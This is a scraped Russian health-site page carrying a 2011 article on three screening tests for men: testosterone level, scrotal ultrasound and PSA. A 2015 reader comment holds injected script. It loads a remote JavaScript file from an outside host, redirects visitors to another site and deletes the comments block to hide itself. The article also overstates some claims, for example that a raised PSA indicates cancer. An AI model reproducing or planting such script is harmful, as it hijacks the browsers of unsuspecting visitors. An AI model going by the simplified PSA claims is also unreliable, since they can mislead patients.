Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Тесты для настоящих мужчи...  >>  Тесты для настоящих мужчин
 
Обратная связь
 

Тесты для настоящих мужчин

Размер шрифта
11 мая 2011 00:01
  • google_analytics: false
  • Нравится

По результатам опросов, мужчины куда легкомысленнее относятся к своему здоровью, чем женщины. Подавляющее большинство сильного пола (72%) не видит смысла в том, чтобы заранее побеспокоиться и пройти скрининговые обследования – хотя бы три самых важных для мужчин.

скрининговые обследования

Антонина Камышенкова / «Здоровье-инфо»

Каждый мужчина, начиная с 30-40 лет, периодически должен проходить три главных обследования. Это анализ на уровень тестостерона в крови, ультразвуковое обследование органов мошонки, а также тест ПСА – тот же анализ крови, который может выявить рак предстательной железы на ранних стадиях. Данные обследования дают полную картину состояния важнейших для мужчин органов и их функций.

Анализ на уровень тестостерона

Выработка мужского полового гормона тестостерона является величиной постоянной, в отличие от женских половых гормонов. К определенному возрасту уровень тестостерона начинает снижаться. Это снижение может длиться от одного месяца до нескольких лет, а вместе с ним будет ухудшаться самочувствие мужчины, равно как и его характер.

Итак, важнейшие функции, которые выполняет тестостерон:

  • Регулирует многие обменные процессы, в том числе и расщепление жиров
  • Отвечает за сперматогенез – образование сперматозоидов
  • Обеспечивает половое влечение, эректильную функцию и эякуляцию
  • Делает мужчину сексуально-привлекательным для женщин
  • Обеспечивает ему мышечную массу, густую щетину, волосатость, низкий бархатный голос, рано наметившуюся лысину (и это тоже признак мужественности)
  • Наличие тестостерона делает мужчину спокойным и уверенным в себе, твердым по характеру, амбициозным и смелым.

Сегодня тестостерон начинает снижаться у совсем молодых мужчин: уже после 30 лет уровень гормона падает в среднем на 2% в год. Причины – все тот же стресс, любовь к еде, ненависть к физической активности, и как результат – ожирение. А именно ожирение – главный признак пониженного уровня тестостерона. Такой мужчина апатичен, вял, у него снижено либидо, и, возможно, уже имеются проблемы с эрекцией. Между тем низкий уровень тестостерона успешно лечится врачами-андрологами. Нужно всего лишь 2 раза в год сдавать анализ крови на уровень тестостерона.

ультразвуковое исследование

УЗИ органов мошонки

Это самый объективный способ определения степени развития яичек, состояния придатков яичек, оценки кровообращения в яичках при снижении либидо и бесплодии. А для мужчины 30-40 лет УЗИ необходимо для выявления опухолей мошонки и визуального контроля – при их биопсии.

Как ни печально, опухоли яичек и опухоли предстательной железы, включая злокачественные, тоже значительно помолодели. И если раньше такие исследования рекомендовались мужчинам после 40 лет, то теперь в зону риска входят и молодые мужчины после 30-ти.

Необходимо срочно обратиться к врачу и сделать УЗИ органов мошонки, если мужчина ощущает:

  • Боли в области мошонки
  • Увеличение яичка и его придатка
  • Неровности яичка и его придатка
  • Уплотнение яичка и его придатка
  • Трудности с эрекцией

А еще лучше не ждать, а раз в год-два проходить профилактическое обследование.

Анализ крови ПСА (PSA)

Простатспецифический антиген или ПСА (prostate-specific antigen) – это вещество белковой природы, которое вырабатывается клетками предстательной железы. Небольшое количество ПСА попадает в кровь через барьер между системой протоков предстательной железы и кровеносным руслом.

На фоне воспалений или новообразований этот барьер нарушается, и уровень ПСА в крови возрастает. Таким образом, повышенный уровень этого антигена в крови говорит об онкологических процессах в предстательной железе.

Если вам больше 50 лет, если вы заметили нарушения мочеиспускания, или же если любой из ваших родственников болел раком предстательной железы, необходимо сделать тест ПСА. На сегодняшний день нормальный показатель этого антигена: 4 нг/мл. Если ваш тест показал более высокое число – тогда вам срочно к онкологу. Он проведет дополнительные исследования для подтверждения или опровержения подозрений: пальцевое ректальное исследование, трансректальное ультразвуковое исследование (ТРУЗИ) или трансректальную биопсию предстательной железы с гистологическим исследованием ее ткани.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы про мясо. Не питайтесь иллюзиями!   Самые популярные мифы о диабете   Как определить тип недержания мочи?   Расстройства мочеиспускания и возраст: есть ли связь?  
19 февраля 2013Мальчик с ожирением не станет мужчиной 28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции!
 
08 февраля 2013Ожирение можно предсказать сразу после рождения 05 декабря 2012Когда вы нервничаете, ваш ребенок толстеет
 

Слайдшоу

1
Что не дает вам заняться сексом
Ваш муж теряет мужественность? Признаки низкого тестостерона
Вся правда о тестостероне

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.